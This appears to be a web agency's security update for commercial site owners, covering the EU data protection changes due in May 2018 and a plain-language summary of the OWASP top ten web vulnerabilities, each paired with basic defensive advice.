Security is a continuous concern for the owners of commercial websites. Such websites are public-facing, with a professional reputation and often handle sensitive customer and user information. That’s why we keep ahead of the latest changes to online security and the evolving methods of strengthening security and reducing vulnerabilities. This security update concerns changes to EU data protection and hosting, as well as the top ten vulnerabilities to web applications and maintaining multiple levels of web security.
EU Data Protection Laws
On the 25th of May, 2018, European Union laws about how companies can treat personal data from users, staff and customers will be updated to tighten protections of such data from breaches or unapproved access. If these directives are not followed then a fine of up to EUR 20 million or 4% of annual worldwide revenue of the company could be fined by the EU. The directives require companies to tell the data protection authority of a data breach within 72 hours, as well as the persons involved if the breach is very serious. Also the criteria for consent to use someone’s personal information will be tightened, and obtaining specific, informed, unambiguous consent will be obligatory.
This change in the law will affect companies and individuals residing in countries in the EEA (Both countries in the EU and countries outside the EU who are members of the single market, such as Norway). It will also affect other countries and businesses but will depend on the local jurisdiction and the hosting company in question. Any company in the EEA are allowed to hold personal information in any member-state, as the same rules apply across the board. These changes will almost certainly affect the UK, as we are expected to still be a member of the EU in May 2018, and because the UK government intends to keep existing EU law upon Brexit, only repealing some laws afterwards.
OWASP is an online community which collaboratively creates tools and methods to increase internet security. That community has, through discussion and debate, established a broad consensus on the ten most important vulnerabilities of websites which need to be addressed:
Injection. This is a technique used to attack data-driven web apps. SQL statements are inserted into an entry field for execution where the software has a vulnerability. This allows attackers to tamper with data, pretend to be administrators, and void or change transactions and balances. Ways of minimising the danger of this happening include enforcing the type and length of the input that can be inserted, ensure input validation at all levels, and avoid dynamic queries and commands.
Weak authentication and session management. Aspects of handling user authentication or session management, if weak or broken, can allow for hackers to take advantage of them, allowing for access to passwords or user information. This can be avoided by following standard practices, secure session cookie flags and validation on all actions.
Cross site scripting. Malicious scripts are injected into otherwise benign and trusted websites. This can lead to compromised sessions and credentials, as well as redirecting users to malicious or misleading sites. You can tackle these methods by adding input validation,sanitizing input, and by output encoding all user input during rendering.
Insecure direct object references. If a reference to an internal object such as a file directory or a database key is left exposed, then this can lead to direct data access from unauthorized users. Protections against this are to ensure that access control checks are performed whenever direct object references are used and to use references instead of direct references where possible.
Security misconfiguration. Insecure servers or security configurations can allow unintended access to data or file functions. This can be the result of out-of-date software, default or naive configurations. The best remedy is a repeatable and testable hardening process of security development. You can also initiate regular updates and patching processes, as well as making use of periodic scans and audits.
Sensitive data exposure. Improper protection or encryption of sensitive data can put payments, credentials or customer details at risk. This can occur either in the website database, or as the data is transferred from server to server. It can also create a PR nightmare for companies, as well as fraud. To protect sensitive data, encrypt it both at rest and in transit.
Missing function level access control. This is when authentication is performed on the front end (UI) but is not performed on application functions. The result is that this allows unauthorized access to data and functions. To protect against this, perform validations by the client and server side.
Cross site request forgery. This is where a logged in user’s browser is forced to send a forged HTTP. Such requests target sites that do not perform proper request validation. Including an unpredictable CSRF token in each request makes your users more secure from forgeries.
Using components with known vulnerabilities. Attacks on vulnerable points in libraries and frameworks bypass security measures and can involve readily available tools. You should be aware of the versions and components used by your site and its applications.
Unvalidated redirects and forwards. Untrusted redirects and forwards compromise your data, and can redirect users to malware sites. Avoid redirects and forwards where possible.